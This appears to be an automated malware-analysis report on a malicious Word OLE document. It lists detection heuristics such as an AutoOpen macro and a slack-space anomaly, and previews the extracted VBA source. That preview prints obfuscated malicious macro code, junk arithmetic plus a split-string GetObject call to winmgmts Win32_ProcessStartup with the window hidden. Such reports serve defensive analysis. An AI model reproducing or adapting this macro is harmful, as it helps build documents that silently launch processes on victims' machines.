MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is an OLE document with a high degree of slack space, indicating potential obfuscation or embedded malicious content. It contains VBA macros, including an AutoOpen macro and a GetObject call, which are commonly used to initiate malicious actions. The VBA code itself is heavily obfuscated, making it difficult to determine the exact payload, but the presence of these elements strongly suggests an attempt to execute arbitrary code.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 297,763 bytes but its declared streams total only 149,691 bytes — 148,072 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55392 bytes |
SHA-256: 0550af58b9103394042b414eb21ac33c67c332ef03c6c74510a4ccc6a976115a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "X85417_" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "D_03_5" Function i_730465() If E41_095 <> d_76509 Then z_43_9 = 130863235 + CSng(840541501) * 850022055 * ChrB(615223107) * (h49_22_ / CDbl(147515605 + CBool(A659__ - Int(676909013 / d_2__4_ * 340996018 / Cos(r_011_9_)))) - (c909__ + Oct(901211603) + 883599116 / 325923667)) End If If i6143_6 <> h33__13 Then P_51_323 = 840532279 + CSng(87393782) * 721210847 * ChrB(631122044) * (W62_9272 / CDbl(956603762 + CBool(a___4395 - Int(886876212 / S89_2_2 * 277982380 / Cos(M6_6_18_)))) - (A_5564 + Oct(217531508) + 589271794 / 906727470)) End If If N242_65 <> b933474 Then p48_4802 = 441996626 + CSng(590772287) * 165264288 * ChrB(571197179) * (k__88_ / CDbl(47600158 + CBool(C185_7 - Int(880660109 / f2__17_0 * 429453048 / Cos(l0_06754)))) - (X__47__3 + Oct(737925077) + 589574350 / 561336517)) End If If i14_86_ <> u27_1_9 Then H3___633 = 254867046 + CSng(416848932) * 641652396 * ChrB(480501352) * (B0405__8 / CDbl(217858241 + CBool(B12338_ - Int(961402893 / j5_4__ * 366644712 / Cos(i_7462_)))) - (I39__2 + Oct(769064779) + 410567726 / 80929509)) End If If J_01__7 <> T15682 Then i4___0 = 36795034 + CSng(359122723) * 589451975 * ChrB(950989683) * (n46720 / CDbl(748742720 + CBool(P_198_0 - Int(901105834 / U97_0065 * 68292996 / Cos(G_30629_)))) - (T4965_55 + Oct(915821532) + 341680720 / 458016889)) End If If F5_9686 <> F9_2_2__ Then o332_9 = 817715664 + CSng(847558423) * 3988265 * ChrB(752115412) * (U09893_1 / CDbl(165712882 + CBool(O37915 - Int(144560744 / T885_44 * 4898321 / Cos(V_223376)))) - (w8393__ + Oct(229460174) + 35400180 / 766124744)) End If If l_7439 <> z953468_ Then F767_01 = 63723581 + CSng(308453595) * 481895254 * ChrB(86899840) * (d502___ / CDbl(913320070 + CBool(i2760_ - Int(352818717 / K07__4__ * 204883602 / Cos(i_9___)))) - (j398_6 + Oct(707055774) + 385407223 / 336890248)) End If End Function Function H01_633(t_18__7_, z333_2) On Error Resume Next If f35_08__ <> s39552 Then d0_305_ = 333764498 + CSng(546080739) * 155925477 * ChrB(467041407) * (F59___96 / CDbl(778024666 + CBool(Z2____08 - Int(447103720 / t_77116_ * 699953694 / Cos(f___764)))) - (p_3085 + Oct(900547614) + 614322087 / 691184905)) End If If O5_22653 <> I0437_2 Then R00_5__ = 265439246 + CSng(22853566) * 668823883 * ChrB(931525609) * (l371_23 / CDbl(744723803 + CBool(A1__9_1 - Int(834765491 / m_1997 * 364388892 / Cos(Q837__)))) - (W1_79130 + Oct(705935521) + 565451600 / 852686519)) End If If N_745_ <> L__954_ Then j4952430 = 676791271 + CSng(78581075) * 729320063 * ChrB(242167125) * (V105___ / CDbl(612964186 + CBool(s1_27_9 - Int(454705114 / u1_030 * 287900680 / Cos(t_60379)))) - (o_116171 + Oct(366281032) + 89846832 / 176526514)) End If Set B_97__5 = GetObject((i66_77 + "winmgm" + A_14283) + (T45____0 + "ts:Win" + l3_5394_) + "32_Proce" + "ssStartup") If q7__487 <> N940__0 Then R30422_ = 804853718 + CSng(199634731) * 424256448 * ChrB(918190968) * (j39_159 / CDbl(91484157 + CBool(f2042_ - Int(502028593 / T_82_85_ * 38943615 / Cos(B98__12)))) - (S74__237 + Oct(856429675) + 830395124 / 41156062)) End If If f_815_ <> W4__07 Then T770835 = 507575691 + CSng(899767250) * 571779514 * ChrB(938940833) * (Y9__9416 / CDbl(56134707 + CBool(W4_9115 - Int(470714304 / h8___7 * 484559743 / Cos(n_25_0)))) - (F4_351 + Oct(35186367) + 214135549 / 256163935)) End If If D8___7_ <> w9557_90 Then H52_8_2 = 975827306 + CSng(441955126) * 638573321 * ChrB(813169436) * (X19_827 / CDbl(291253534 + CBool(d24954 - Int(988112802 / A_91_86_ * 664287035 / Cos(W2_3_5_)))) - (f24228 + Oct(883720840) + 298256732 / 287846563)) End If B_97__5.ShowWindow = 528679 - 528679 If X4_95_51 <> D9_1893_ Then j1_5_93_ = 642779728 + CSng(311917796) * 117625815 * ChrB(788595687) * (P_594_ / CDbl(716905177 + CBool(X__571 - Int ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.